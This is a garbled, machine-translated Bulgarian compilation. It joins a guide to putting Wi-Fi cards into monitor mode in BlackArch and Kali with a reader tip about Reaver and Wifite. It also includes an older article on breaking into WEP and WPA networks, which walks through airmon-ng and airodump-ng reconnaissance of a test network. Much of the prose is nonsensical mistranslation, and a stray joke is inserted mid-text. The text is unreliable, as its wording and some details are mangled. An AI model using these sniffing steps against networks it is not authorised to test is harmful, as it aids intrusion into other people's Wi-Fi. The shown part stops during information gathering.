Прехвърляне на безжична карта в режим на наблюдение (внимание) в BlackArch. Решение: Wi-Fi картата не преминава в режим на монитор, когато името се промени на wlan0mon Поставяне на карта без дромове в режим на монитор с командата iwconfig

Можете да превключите карта без droto в режим на монитор BlackArch с помощта на командата iwconfig. Тази команда е част от net-tools. Самият пакет се дължи на aircrack-ng, така че ако BlackArch вече е инсталирал aircrack-ng, тогава вече имате този пакет за виновен. Тим не е по-малко, така че когато опитате победителя, ще ви напомнят за извинението, че командата iwconfig не е намерена, след което инсталирайте следващия пакет:

$iwconfig enp3s0 не може да има безжични разширения. wlp2s0 IEEE 802.11abgn ESSID:off/any Mode:Managed Access Point: Not-Asociated Tx-Power=15 dBm Повторен опит кратко ограничение:7 RTS thr:off Fragment thr:off Управление на захранването:изключено $

За enp3s0 ни пишат, че този интерфейс няма разширение без дартс. lo tse vzagalі не е правилният интерфейс. Тобто. Shukane im'ya droto іinterfeysu tse wlp2s0.

Нека да разгледаме името на безжичния интерфейс, ще щракнем върху записа Mode:Managed. Тобто. НЕ нулирайте интерфейса в режим на монитор. Можете да превключите йога в режим на бдителност със следната последователност от команди:

sudo ifconfig wlp2s0 надолу sudo iwconfig wlp2s0 режим монитор sudo ifconfig wlp2s0 нагоре

Або в един ред:

sudo ifconfig wlp2s0 надолу && sudo iwconfig wlp2s0 режим монитор && sudo ifconfig wlp2s0 нагоре

Нека да разгледаме отново:

$iwconfig enp3s0 не може да има безжични разширения. wlp2s0 IEEE 802.11abgn Режим: Честота на монитора: 2,412 GHz Tx-Power=15 dBm Кратко ограничение за повторен опит: 7 RTS thr:off Fragment thr:off Управление на захранването:изключено не могат да се използват безжични разширения.

Като bachimo, един ред, scho да ни се обади, се промени на Mode:Monitor, така че превключихме Wi-Fi картата в BlackArch в режим на охрана.

Можете да обърнете:

sudo wifite

sudo airodump -ng wlp2s0

Да, BlackArch тези програми трябва да стартират obov'azkovo със sudo- защо не ти Kali Linux.

Както можете да видите от моите екранни снимки, всичко се получи чудесно за мен. Сега нека да разгледаме възможни причинилош късмет.

Защо картата без дрото BlackArch не преминава в режим на защита

  1. За кочана смени, това което практикуваш не е в виртуален компютър(VirtualBox, например). VirtualBox може да работи само USB wifiкарти.
  2. Уверете се, че въвеждате командите правилно, не е необходимо да въвеждате името на моя интерфейс без дартс, за да знаете името си с командата iwconfig.
  3. Е, да, не повече, не по-малко, но не повече - вашата карта без дрото (или драйвер) просто не поддържа режима на бдително. Ако искате да подхванете тази тема, тогава не щамповайте и си купете една от картите, на които те ще познаят

Чудете се на актуализираната инструкция, тъй като тя е подготвена за замяната на тази инструкция.

Прехвърлянето на картата без дрото в режим на монитор (контрол) е първото нещо, което трябва да се направи, преди кочанът да тества мрежата без стрели за проникване. Ако не го ограбите, значи програмата не работи правилно! Затова се е счупил наред, или се е объркал на този етап, всички други неща, описани в инструкциите, без глава.

Тази подова настилка е основна операция, така че инструкциите просто пропускат целия ред. И deyakі дори за кратко yogo zagaduyut, така че да имате извинение за часа, когато картата се прехвърли в режим на управление, тогава е важно новодошлите да разберат защо не правят нищо.

Как да означавам, в кой режим е картата без стрела

За да контролираме процеса, нека започнем, като разберем в какъв режим е картата без стрела. Можете да започнете с командата:

Iwconfig

[защитен с имейл]:~# iwconfig eth0 без безжични разширения. wlan0 IEEE 802.11abgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm Кратко ограничение за повторен опит:7 RTS thr:off Fragment thr:off Ключ за шифроване:изключен Управление на захранването:изключено не може да безжични разширения.

Имам два интерфейса (eth0 и lo), които не могат да използват безжични разширения (без безжични разширения.), не ни миришат и няма да можем да се обърнем към тях. Кликнете върху нас wlan0. От предоставената информация в този час за нас е важно да Режим: Управляван. Tse означава, че картата без дартс е в режим на керн.

Как да получите режими на карти без дартс

Първо слезте надолу, за да промените режима на картата без карта, нека да разберем каква смрад е и каква, добре, ние не сме във властта на режима.

Инсталирането на роботизирания режим и аз ще добавя, за да попаднат в топологията на земята и целите на vikoristannya. Режимът може да бъде:

  • ad hoc(Мережа се сгъва само от един център без точка за достъп),
  • Управлявана- Keranovaniya (Vuzol се свързва с най-близката точка за достъп, което допринася за анонимност, е роуминг)
  • майстор- Meister (възможно е основно синхронизиране или работа като точка за достъп),
  • Повторител— Повторител (вузолът пренасочва пакети между други възли без дарт)
  • втори- Вторини (вузол виступа като резервен майстор / повторител),
  • Монитор— Контрол
  • Автоматичен- автоматична.

Vzhe zhego Кратко описаниестана ясно, че мислим за режима за нас - режима на монитора (контрол).

Превключване на карта без droto в режим на наблюдение с командата iwconfig

По най-популярния начин ще го преведа с помощта на програмата airmon-ng. ейл Час за почивкає podlennya за следващото помилване. Командата airmon-ng не променя режима на управление, а променя името на интерфейса. Така че през повечето време airmon-ng го променя и НЕ променя y в режим на наблюдение. Непоследователността на ситуацията може да ви накара да приспите.

Затова ще започна с алтернативен метод за прехвърляне в режим на управление, тъй като няма добра съгласуваност. Необходимо е да въведете следната последователност от команди:

ifconfig wlan0 надолу iwconfig wlan0 монитор режим ifconfig wlan0 нагоре

Або в един ред

ifconfig wlan0 надолу && iwconfig wlan0 режим монитор && ifconfig wlan0 нагоре

Моля, имайте предвид, че в кожата на тези команди може да се наложи да замените wlan0 с име, което може да е вашият безжичен интерфейс. Tse im'ya може да бъде разпознат от този екип iwconfig, въведен без опции. Необходимо е да се справите с обидни команди - заменете името на интерфейса със свое собствено, тъй като имате друго име.

Потвърдете:

Ред Режим: Мониторкажи ни, че всичко е далече.

Каналът може да бъде инсталиран по следния начин:

Iwconfig wlan0 канал 3

Ale, първо, дяконите на режима игнорират цената на оправянето, по различен начин, не е необходимо често.

По-лесно е да настроите канала директно в програмата:

airodump-ng wlan0 --канал 3

Как да превърнете картата без стрела в режим на keruvannya (управляван)

Преминаването към режим на кериране може да стане по следния начин:

ifconfig wlan0 надолу iwconfig wlan0 режим управлява ifconfig wlan0 нагоре

Що се отнася до превключването към режим на управление, хакнахме метод, който промени името на интерфейса (напр. wlan0mon), тогава всички отбори трябва да бъдат заменени wlan0на нов интерфейс.

Как да поставите безжична карта в режим на монитор с командата airmon-ng

Преди речта, за командата airmon-ng в Енциклопедията на Kali Linux, можете да я прочетете за cim съобщения (руски): http://kali.tools/?p=406

Нека разгледаме наличните интерфейси:

[защитен с имейл]:~# airmon-ng PHY интерфейсен драйвер чипсет phy0 wlan0 iwlwifi Корпорация Intel Centrino Advanced-N 6235 (rev 24)

За да превключите към режим на наблюдение, командата е:

airmon-ng стартиране на wlan0

Ако знам дали имате различно име на интерфейс (а не wlan0), тогава запомнете това име, като насочвате командата към новата.

Заключението ни казва две команди (можете да разгледате подробностите за повече препратки към Енциклопедията):

airmon-ng проверка airmon-ng проверка убийство

Ale особено menі tsі екипи не помагат.

Командата за режим на монитор е както следва:

airmon-ng стоп wlan0mon

Ако картата ви не може да бъде превключена в режим на наблюдение (внимание), това означава, че имате нужда нова wifiкарта. За да помогнете с избора, обърнете се към статията "".

Syn заявка на бащата на програмиста:
- Тату, защо слънцето изгрява на сбора?
- Променихте ли решението си?
- Така.
- Работиш ли?
- Така.
– Кой ден работиш?
- Така.
- Тоди синку, за бога, нищо не чипвай, нищо не сменяй!

Смяташе се, че самият проблем е в River. Нов е многократно помилван за kshtalt "ПРЕДУПРЕЖДЕНИЕ: Неуспешно свързване с". Ако обаче сте привлечени от други програми, например Wifite, тогава има същия проблем - атака срещу WPS не работи. Penetrator-WPS също не работи.

Внушение Владимир. Йога ос:

„След като забележите проблема, не насилвайте airmon да превключи картата в режим на наблюдение (името на картата беше променено на wlan0mon, но режимът вече не беше управляван), penetrator не успя да превключи картата към монитор веднъж. В резултат на това превключих картата в режим на наблюдение ръчно чрез iwconfig wlan0 mode monitor. След този penetrator -i wlan0 -A rozpochav robot"

Владимир, величие за теб, какво решение беше донесено до vіrne!

Грешка за безжична заявка "Set Mode" (8B06): SET неуспешно на устройство wlan0; Устройството или ресурсът са заети.

Според мен (мисля и при други, които имат подобна ситуация с River) се оказа, че картата просто не е преминала в режим на монитор.

Възможно ли е да се ограби, сякаш е посочил Владимир, с офанзивна команда:

Iwconfig монитор в режим wlan0

Честно казано, екипът в мен е видял такова извинение:

Грешка за безжична заявка "Set Mode" (8B06): SET неуспешно на устройство wlan0; Устройството или ресурсът са заети.

Podolat tsyu извинете и прехвърлете картата в режим на монитор ми беше разрешено от следната последователност от команди:

ifconfig wlan0 надолу iwconfig wlan0 монитор режим ifconfig wlan0 нагоре

В резултат на това картата беше превключена в режим на монитор и програмите, които победиха този режим, бяха подредени.

Днешната статия е чудесен пример за това, че мощните ни знания се умножават, ако ги споделим с другите.

Преди Wi-Fi мрежата без дартове (стандарти 802.11a/b/g) всички се обаждаха от дълго време. Горещите точки вече не се обаждат на никого, а в офисите на Wi-Fi дартс. Освен това вече има доставчици на Wi-Fi достъп до интернет за домашни и корпоративни клиенти.
Особено популярен беше ларинксът от мрежи без стрели в умовете на домакинството. Типична ситуация: у дома има повече от един компютър, но за всеки е необходимо да се осигури достъп до интернет или имате нужда от достъп до интернет от лаптоп на всяко място в апартамента. При тези настроения оптималното и часът е един и същ възможни решенияе zastosuvanya drotovyh рутери, които позволяват помощта на една кабелна връзка с интернет за ADSL технология или Ethernet за внедряване достъп без дартовеза всички домашни и офис компютри. През последния час подовите настилки станаха популярни без самия рутер за домашни користувачи.

Въпреки това, вземайки решение за преминаване към безжична Wi-Fi мрежа, не забравяйте, че тя не беше перфектна по отношение на сигурността. Поради нарастващата популярност на мережите без стрели, интересът се повишава в полза на лукавия. Vіn not stіlki maє komertsіyne pіdґruntya, sіlki възклицания със страст. Вярно е, че злото на бариерата в името на безплатния достъп до интернет вече не е актуално в наше време - въпреки че тарифите за достъп до интернет са ниски, по-лесно е да се плаща, по-ниска цена на мрежата. И оста на спортния интерес е същата вдясно: зло в името на злото и нищо особено. Bezdrotovі mezhiте се опитват да клеветят просто това, което е tsіkavo.

Има много митове, свързани с разливането на неизкоренената бягаща пътека, и богато coristuvachiv vvazhayut, че ако бягащата пътека без стрели вече не е безопасна и можете да бъдете зли. В интерес на истината, всичко не е толкова просто: по-малко вероятно е да избухнете в ръмжене без стреличка при випадките с цвят на вино (ако например сте развили този налащовував, като сте пропуснали користувача). Опитайте zdіisniti неоторизиран достъп до оградата без стрели на всеки доставчик и ще разберете, че всъщност оградата без стрели може да бъде защитена безопасно.

В тези статии е показано на практични приклади, в някои ситуации как е възможно да се счупят пискюлите без нарязване и да се отнеме знания, можете успешно да спечелите за одит на безопасността на линиите за вършитба без стрели, което ще позволи традиционните помилвания да изчезнат, които са разрешени, когато бъдат нарушени.

Показателно е, че в един от малките броеве на нашето списание вече описахме методите за хакване на мрежата без стрели. конкретни примери. Prote, yak z'yasuvalos, z' се появиха нови версии софтуер, признат за злия mezh, и въпреки че методологията на злото не се е променила, нашият „помощник на младия хакер“ явно ще изисква надграждане.

На тила гледаме основните предпазни стъпала, като че ли застояват тази година за захисту без мрежи за стрели, а после ще ви кажем, като че ли идва вонята.

Methodi zahistu bezdrotovyh mezh

Стандартите на бягащата пътека без дартс се използват за прехвърляне на цаца на защитните механизми:

  • режим на удостоверяване и криптиране на данни с помощта на протокол WEP (Wired Equivalent Privacy);
  • режим на удостоверяване и криптиране на данни зад протокола WPA (Wi-Fi Protected Access);
  • филтриране за MAC адреси;
  • Vykoristannya към режима на прикачен іdіdіfіkatі merezі.

WEP протокол

Всички текущи безжични добавки (точки за достъп, безжични адаптери и рутери) поддържат протокола за защита WEP, който е донякъде основа за спецификацията за безжична мрежа IEEE 802.11.

Протоколът WEP ви позволява да шифровате потоци от данни на базата на алгоритъма RC4 с размер на ключа от 64 или 128 бита. Deyakі pristroї pіdrimuyut ключове в 152, 256 и 512 бит, но tse vynyatok z правила. Ключовете се наричат ​​също статичен склад с размер 40 и 104 бита, валиден за 64- и 128-битови ключове, както и допълнителният динамичен склад с размер 24 бита, който се нарича инициализиращ вектор (IV).

На най-просто ниво процедурата за WEP криптиране изглежда така. Данните в последователност, които се предават в пакети, се проверяват за целостта (алгоритъм CRC-32), след което контролна сума(стойност за проверка на целостта, ICV) се добавя към полето за услуга за заглавка на пакета. След това се генерира 24-битов вектор за инициализация (IV), към който се добавя статичен (40 или 104-битов) таен ключ. Оттеглянето в такъв ранг е 64 или 128-битов ключ и е изходен ключ за генериране на псевдо-реципрочно число, побеждаващо за криптиране на данни. Данните на Dali се изпращат (криптирани) за помощ логически операции XOR от псевдоключовата последователност и векторът за инициализация се добавя към полето за обслужване на рамката.

От първичната страна данните могат да бъдат декриптирани, на парчета наведнъж от данните се предава информация за вектора за инициализация, а статичният ключ за съхранение се взема от потребителя, към когото се предават данните.

Протоколът WEP предава два метода за удостоверяване на ядрата: Open System (Vdkrita) и Shared Key (Global Key). Когато vikoristanny vіdkrytoї authentifikatsії vlasne zhodnoї autentifikatsії не vіdbuvaєє, otrimati достъп до bezdrotoї nerezhі може да бъде един вид coristuvach. Въпреки това, navіt с един поглед отворена системаРазрешено е WEP криптиране на данни.

WPA протокол

През 2003 г. има друг стандарт за сигурност - WPA, чиято основна характеристика е технологията за генериране на динамичен ключ за криптиране на данни, базиран на протокола TKIP (Temporal Key Integrity Protocol), който е по-нататъшно развитие на алгоритъма за криптиране RC4. Зад протокола TKIP се използва разширение с 48-битов вектор за инициализация (на входа на 24-битов WEP вектор) и имплементира правилата за промяна на последователността на един бит, което включва пренабиране на ключовете. Протоколът TKIP е препратен, за да генерира нов, 128-битов ключ за пакета на кожата, който се предава. В допълнение, WPA криптографските контроли са защитени за нов метод - MIC (Код за целостта на съобщенията). В рамката на кожата има специален осембайтов код за сигурността на съобщението, чиято повторна проверка ви позволява да показвате атаки от блокиране на допълнителни пакети. В резултат на това се оказва, че пакетът от данни е кожен, който се предава чрез мярка, има авторитетен уникален ключ, а кожата на закрепването на безжичната нишка получава динамично променящ се ключ.

Разбира се, протоколът WPA насърчава криптирането зад усъвършенствания стандарт AES (Advanced Encryption Standard), който е по-стабилен от криптоалгоритъма на протоколите WEP и TKIP. Искате ли да поговорим за протокола WPA2.

В случай на запушване на гърло в домашни умове или в малки офиси, ще звучи вариант на протокола за защита WPA или WPA2, базиран на общи ключове - WPA-PSK (Pre Shared Key). Nadalі разглеждаме само опцията WPA / WPA2-PSK, без да се придържаме към опциите на протокола WPA, ориентирани към корпоративни активи, деуторизацията на користувачите се извършва на отделен RADIUS сървър.

Когато използвате WPA/WPA2-PSK, конфигурираните точки за достъп и профили без стрелаОт клиентите се изисква да въведат парола за влизане от 8 до 63 знака.

Филтриране на MAC адрес

Филтриране на MAC адреса, който се филтрира от всички съвременни точки за достъп и безжични рутери, дори и да не е така складдо стандарта 802.11, тъй като има значение, ви позволява да преместите границата на безопасност на мрежата без стрели. За реализиране на тази функция се създава таблица в настройките на точката за достъп за MAC адреса на безжичните адаптери в клиентите, оторизирани да работят в тази мярка.

Свързан SSID режим на връзка

Друг zabіzhny zasіb, който често vikoristovuyut в bezdrotovyh merezha - tse режим прикрепен іdіdіfіkatі іnіrіzhі. На мрежата без кожа е присвоен собствен уникален идентификатор (SSID), който ще нарека мрежа. Когато се опитва да намери телена рамка, драйверът на адаптер без нарязване ще сканира въздуха за наличие на безчервична нишка. Ако режимът на прикачения идентификатор е различен (по правило този режим се нарича Скриване на SSID), сливането не се показва в списъка с наличните и е възможно да се свържете с него, само на първо място, той е абсолютно същият като SSID, но по друг начин, зад обхвата от творения на профила на връзката mezhі.

Хакване на мрежи без стрели

След като се запознахме с основните методи за противодействие на стандартите 802.11a/b/g, нека да разгледаме начините да ги направим. Показателно е, че за злото WEP- и WPA-merezh vikoristovuetsya един и същ инструментариум, това е малко, scho да влезе в арсенала на нападателя.

Хакерски Арсенал

Отче, за злото на мрежата без стрели, имаме нужда от:

  • лаптоп чи компютър;
  • "правилна" операционна система;
  • писане на помощни програми за зло;
  • безжичен wifi адаптер.

Ако всичко е ясно с лаптоп (компютър), тогава решението на атрибутите на крадца ще изисква коментари.

"Правилна" операционна система

Основният проблем, който е виновен за процеса на избор на инструменти за злия мереж без дартс, е този за сигурността на чипа на адаптера без дартс, дефектната софтуерна сигурност на операционната система.

Всички помощни програми, които ви позволяват да хакнете оградите без стрели, са "затворени" под системата Linux. Іsnuyut, schopravda, их аналози под Windows-системата, ale, зад голямата rahunka, tse детски белкит. Linux-системи за зла красота, фрагменти за победен Linux, наборът от възможни инструменти е богато широк, а тези Linux помощни програми са много по-умни. Е, не шлем мережі на Windows-системи! След това, под Linux, можете да работите с всичко толкова бързо.

Щом ледът овладее Windows, той патологично се страхува от думата Linux, нека побързаме и се успокоим: ще опишем начините за хакване на границата, така че да няма значение дали инсталирате операционната система Linux на вашия компютър (лаптоп), но в същото време ще има измама Linux и за помощ Linux-помощни програми. Просто ускоряваме със специална Linux дистрибуция, която не изисква инсталация на компютър и може да се стартира от CD/DVD или USB флаш устройства. И което е по-важно, това разпределение вече е необходимо за злата полезност. Нещо повече, няма да се налага да инсталирате драйвери за видеокарта или адаптер без дартс. Всичко, което е необходимо за роботите, вече е интегрирано с разпределителни комплекти - след като се възползвате от йога и практика!

По принцип е възможно да получите много опции за Linux дистрибуции, които не изискват инсталиране на компютър (т.нар. LiveCD Linux пакети), тъй като ви позволяват да заснемате операционната система Linux от CD / DVD- диск или USB флаш устройство. Въпреки това за нашата цел най-добър изборЩе има BackTrack 3 Beta пакет, който е базиран на Linux (версия на ядрото 2.6. Показателно е, че scho, krіm іnstrumentarіu, nebhіdno dlya ни за зло drotoї mérezhі, tsey disk, за да отмъсти на много други помощни програми, които позволяват одит на mérège (портови скенери, снифери и т.н.).

Образ този дискможете да го получите от сайта за заявката: http://www.remote-exploit.org/backtrack.html. На този сайт можете да намерите версията на дистрибутивния комплект за USB флаш устройството. Показателно е, че ако вашият компютър или лаптоп все още не е остарял и е готов за използване с USB, тогава най-добре е да запишете самия вълнуващ дистрибутор на USB флаш устройство. Заснемането на операционната система от флаш носител е много по-бързо от заснемането от CD / DVD-диск.

За да създадете вълнуващо USB-носител, имате нужда от флаш устройство с капацитет 1 GB. Бийте се така. Файлът bt3b141207.rar е взет от сайта, той се пренаписва във флаш-преносима две директории: boot и BT3 Windows система). След това в директорията за зареждане намираме файла bootinst.bat и го стартираме. В резултат на това на флаш устройството ще бъде създадена вълнуваща дистрибуция (Master Boot Record, MBR), която може да бъде завантажувален дискС операционна система Linux След като сте направили необходимите настройки в BIOS (за да позволите заснемането от USB пренасяне), поставете USB флаш устройството в компютъра (лаптоп) и рестартирайте компютъра. След няколко секунди на компютъра, операционната система Linux ще бъде оплетена с необходимите помощни програми за хакване на мрежи без дартс.

Набирайте помощни програми за зло

Традиционно за зла мрежа без дартс се инсталира софтуерният пакет aircrack-ng, който се използва както във версиите на Windows, така и във Linux. Текущата версия на пакета е aircrack-ng 1.0 Beta 1 (за Windows и Linux се използва същото номериране на версиите). Както вече решихме, не е сериозно да се възползваме от Windows версията на програмата и затова не бива да прекарваме час в разглеждане на версията на Windows и да се фокусираме върху самата версия на Linux.

Този пакет е абсолютно безплатен и можете да го получите от официалния уебсайт http://aircrack-ng.org. Помощните програми Shukati be-yakі іnshі просто нямат смисъл, парчетата от този пакет са най-добрите решениявъв вашия клас. Освен това, версията за Linux все още ще бъде преди BackTrack 3 Beta дисковия запас, така че когато спрете BackTrack 3 Beta дистрибуцията, не е нужно да продължавате и да инсталирате пакета aircrack-ng.

Безжичен Wi-Fi адаптер

Както вече споменахме, основният проблем, който е виновен за процеса на избор на инструменти за злите мрежи без дартс, се крие в сигурността на софтуерната сигурност, операционната система и чипа на бездартния адаптер. Нека да разгледаме отчета и да напуснем склада.

Жалко, че не всички адаптери без дартс могат да се използват за хакване на мрежи без стрели. Освен това има адаптери, дори и да се поддържат от помощни програми, но те могат да се използват по правилния начин (има сенсибилизиран анализ на пакетите).

Вдясно, за хакване на безжична мрежа, са необходими специални (нестандартни) драйвери за адаптери за безжичен проводник. Редовните режими на всеки безжичен адаптер се спазват от инфраструктурата (основен набор от услуги, BSS) и ad-hoc (независим базов набор от услуги, IBSS). Инфраструктурният режим има връзки на скин-клиент към мрежата чрез точка за достъп, а в режим ad-hoc безжичните адаптери могат да бъдат свързани един към един без различна точка за достъп. Нарушенията обаче не са разрешени от режимите към адаптер без дартсподслушва ефира и пренася пакети. За прехвърляне на пакети използвайте специален режим на наблюдение (Monitor mode), когато се прехвърля към определен адаптер, той не е свързан с конкретен пакет и улавя всички налични пакети. Драйверите, предоставени от бездромния адаптер, не поддържат режим на наблюдение и за да направите това, трябва да инсталирате специални драйвери, често написани от група доставчици на трети страни. Важно е, че драйверът е необходим за конкретен чип, за който се нарича адаптер без droto. Например адаптери от различни типове, които могат да бъдат наречени по различен начин, могат да бъдат базирани на един и същ чип и едни и същи за тяхната работа в режим на наблюдение, един и същ драйвер ще бъде бит. От тук се проявява едно от основните неща операционна система Linux семейства: за тях да се знаят „правилните“ драйвери за чипа на адаптер без чип е много по-лесно, по-ниско за Windows, същият списък с адаптери без чип, за които да се използват „правилните“ драйвери за Linux, е много по-широк, по-нисък за Windows.

У пълен списъкчипове, за които има специални драйвери, които поддържат режима на наблюдение за работа Linux системиче Windows може да се намери на http://aircrack-ng.org.

В момента в повечето лаптопи се инсталира безжичен Wi-Fi адаптер, базиран на чипове на Intel (чипове IPW2100, IPW2200, IPW2915, IPW3945, IPW4945). Tse лаптопи платформи на Intel Centrino, а да знаете за наличието на интегриран адаптер без droto в средата на лаптоп, е още по-просто - всички лаптопи на платформата Intel Centrino са залепени с двоен стикер с логото на Centrino.

Освен това, докато се занимавахме с хакването на безядрени мрежи, установихме, че безядрените адаптери, базирани на чипове на Intel, независимо от тяхната сложност с Linux версията на пакета aircrack-ng, са лошо подходящи за хакване на безядрени мрежи. Todi tsі chipi бяха практикувани още по-правилно, което ги направи практически неприемливи.

Prote през последните няколко години нещо се промени, например версията на пакета aircrack-ng. И най-важното - появиха се нови версии специални драйверипод Linux за безядрени чипове на Intel. Аз, както се оказа, с новите драйвери, безжичните адаптери като Intel работят в режим на наблюдение насаме. По-конкретно, има адаптер без резба на чипа IPW3945. Вярно е, че независимо от тези, че дадения чип се контролира в режим на наблюдение, за някои специфични операции (всякакви видове атаки) не е възможно да се използва този адаптер без дартс.

Vzagali, за злата мрежа без стрели е по-важно да спечелим, според нас, адаптер без стрели на чипове от серията Atheros.

Етапи злото бездарно мержа

Злините на бездротовия мережи се извършват на три етапа (Таблица 1):

  • избор на информация за бягащата пътека без дартс;
  • торби за рязане;
  • анализ на пакета.

Съобщава се, че Dali mi на практични дупета е гледал кожа от тези етапи. За да демонстрираме възможностите на злото безнервно сливане, стартирахме експериментално безнервно сливане, базирано на клетъчния рутер TRENDnet TEW452BRP и клиента nexus - настолен компютър с клетъчен адаптер TP-LINK TL-WN651G.

За злото merezhі mi zastosovuvali лаптоп на основата мобилна технология Intel Centrino с безжичен адаптер, базиран на чипа Intel IPW3945, както и TP-LINK TL-WN610G безжичен PCMCIA адаптер на базата на чипа Atheros AR5212/AR5213.

Още веднъж е важно, че ако използвате BackTrack 3 диск, не е необходимо да инсталирате никакви допълнителни драйвери без Dart адаптер - всичко вече е на диска.

Събиране на информация за бягащата пътека без дартс

На първия етап е необходимо да изберете подробна информацияза bezdrotov mezha, scho zlamuetsya:

  • MAC адрес на точка за достъп;
  • име на сливането (прост идентификатор);
  • вид мярка;
  • вид победоносно криптиране;
  • номер на канала за повикване.

За събиране на информация за сливането без root, се използват помощните програми airmon-ng и airodump-ng, които са включени преди aircrack-ng и пакетът, естествено, да присъстват в BackTrack 3 Beta дистрибуцията.

Помощната програма airmon-ng работи, за да настрои драйвера на адаптер за сливане без ядро ​​в режим на наблюдение на сливане без ядро, а помощната програма airodump-ng ви позволява да извлечете необходимата информация за сливане без ядро.

Последователността на събитията е същата. Взехме лаптоп с USB флаш устройство, на което беше инсталиран дистрибутивният комплект BackTrack 3 Beta отпред (инструкциите за създаване на дистрибуторския комплект са показани по-горе). Нека извикаме командната конзола (фиг. 1) и стартираме помощната програма airmon-ng, която е включена преди пакета aircrack-ng. Позволява ви да зададете отдалечен интерфейс без роуминг интерфейс и да зададете режима на наблюдение на мярка на един от наличните интерфейси.

Ориз. 1. Стартиране командна конзола

Синтаксисът за офанзивната команда airmon-ng е:

airmon-ng ,

де опции означава кочан или zupinennya режим на наблюдение; - не-dart интерфейс, който е необходим за наблюдение, но необвързващ параметър задайте номера на канала на безжичната мрежа, който е основа за наблюдение.

Ченге в екипа на кочана airmon-ngТой е конфигуриран без параметри (малки 2), което ви позволява да изберете списък с налични безжични интерфейси.

Ориз. 2. За информация относно валидността
адаптери и интерфейси без дрото работят
airmon-ng команда без параметри

Поддръжка за интегриран безядрен адаптер Intel 3945ABG

Първо, нека да разгледаме последователността от събития на интегрирания безядреен адаптер Intel 3945ABG, а след това и ситуацията с безядрения PCMCIA адаптер TP-LINK TL-WN610G, базиран на чипа Atheros AR5212/AR5213.

Също така, когато интегрираният безядрен адаптер Intel 3945ABG беше спрян, отговорът на командата airmon-ngбез параметри, ние вземаме предвид производителността между адаптера и интерфейса, даден на този адаптер. Нашият адаптер Intel 3945ABG има интерфейс. wlan0(фиг. 3).

Ориз. 3. Присвоен е адаптер Intel 3945ABG
интерфейс wlan0

Показателно е, че тъй като компютърът има един адаптер без droto, след това на следващия час командата airmon-ngотвореният интерфейс автоматично се превключва в режим на наблюдение. Тъй като в компютъра има няколко интерфейса без droto, е необходимо изрично да се посочи кой интерфейс трябва да бъде превключен в режим на наблюдение, но в нашия случай има само един интерфейс без droto, достатъчно е да завършите команда airmon-ngбез параметри.

След това, когато безжичният адаптер се превключи в режим на наблюдение, можете да започнете да събирате подробна информация за безжичния адаптер. За кой хак е помощната програма airodump-ng. Той zastosovuєtsya както за прехвърляне на пакети от сапани без прашка, така и за събиране на информация за безпаровния слинг. Синтаксис на варианта на командата за атака:

airodump-ng .

Възможни опции за показване на команди в таблицата. 2.

Стартиране в началото на командата airodump-ngкато параметър е необходимо да посочите само името на интерфейса без дартс, който се използва в режим на наблюдение, така че: airodump-ng wlan0. Отже, набиране командна линия airodump-ng wlan0и като минимум подробна информацияза всички без стрели, в района, където се познаваме (фиг. 4).

Ориз. 4. Командата airodump-ng wlan0 ви позволява да премахнете информация
за всички bezdrotovy merezhі

Ние сме експериментални тестова бягаща пътека, който сме дали на ComputerPress ESSID. Як бахете, отбор airodump-ng wlan0ви позволява да вземете цялата необходима информация за мярката и самата:

  • MAC адрес на точка за достъп;
  • MAC-адреси на активния клиент на безжичната мрежа;
  • вид мярка;
  • ESSID на мярката;
  • тип криптиране;
  • номер на канала за повикване.

Нашето приложение за ComputerPress има следните атрибути:

  • MAC адреси на точки за достъп - 00:18:E7:04:5E:65;
  • MAC адрес на клиента - 00:15:AF:2D:FF:1B;
  • тип мрежа – 802.11g (54);
  • Мережи ESSID - ComputerPress;
  • тип криптиране - WEP;
  • номер на канал за повикване - 12.

Показателно е, че помощната програма airodump-ng ви позволява да зададете ESSID независимо, независимо дали точката за достъп е настроена на режим Hidden SSID или не.

Дали, за да филтрирате всички записи, можете отново да изберете отбора airodump-ng, след въвеждане на параметрите като интерфейс и номера на канала като връзка: airodump-ng -канал 12 wlan0. Ако е така, ние отнемаме информация само за линията без ивици, която трябва да ни се обади (фиг. 5).

Ориз. 5. Вариант на команда airodump-ng в режим на филтриране
комуникационните канали ви позволяват да филтрирате цялата искана информация

TP-LINK TL-WN610G PCMCIA адаптер, базиран на чип Atheros AR5212/AR5213

Когато старият PCMCIA-адаптер с чипа от серията Atheros е фиксиран (на моменти името на адаптера е абсолютно неважно) последователността е различна.

Необходимо е да включите адаптера за интеграция, за да използвате съществуващия адаптер. Можете да го направите или с бутон (като този), или с комбинация от клавиши, или персонализиран BIOS(За различни лаптопи с интеграции адаптерът без дрото се включва по различен начин). След това PCMCIA картата се поставя и лаптопът се рестартира.

Как да стартирате, подканете командната конзола и изпълнете командата airmon-ngбез настройки, за да видите списъка с наличните безжични интерфейси.

На различна станция на интегриран адаптер без дрото, базиран на чип от серия Atheros, отговор на команда airmon-ngбез параметри, ние вземаме предвид производителността между адаптера и интерфейса, даден на този адаптер. Нашият адаптер на чипа Atheros има интерфейс wifi0същия виртуален интерфейс ath0който се генерира от интерфейса wifi0(фиг. 6). Важно е, че интерфейсът wifi0назначен шофьор madwifi-ng, който поддържа режима на наблюдение.

Ориз. 6. На адаптера на чипа Atheros е назначен wifi0 интерфейс

За да поставим нашия адаптер без droto в режим на наблюдение, изпълняваме командата airmon-ng стартиране на wifi0. В резултат на това имаме още един виртуален интерфейс. ath1(фиг. 7). По-важното е, че режимът на наблюдение се реализира чрез новия (мониторният режим е активиран).

Ориз. 7. Прехвърляне на wifi0 интерфейса в режим на наблюдение

Виртуален интерфейс ath0ние не се нуждаем от него, а йога е необходима, за да го изключим. За кого е победителят отбор ifconfig ath0 надолу(фиг. 8).

Ориз. 8. Активирайте интерфейса ath0

Ако е така, можете да преминете към етапа на събиране на информация за линията без дартс за допълнителен екип airodump-ng ath1(фиг. 9). Показателно е, че дори и с нейната vykonanna да не се преминава през опаковането на пакети, това означава интерфейс ath0не е изключен и е необходимо да се повтори процедурата по включване.

Ориз. 9. Събиране на информация за линията без дартс за помощ на екипа
airodump-ng ath1

Да се ​​преразгледа, че всичко е настроено правилно, същият интерфейс ath1бъдете в режим на наблюдение, ръчно спечелете командата iwconfig(Не се отклонявайте с екипа ifconfig) без параметри. Позволява ви да преглеждате информацията за всички интерфейси.

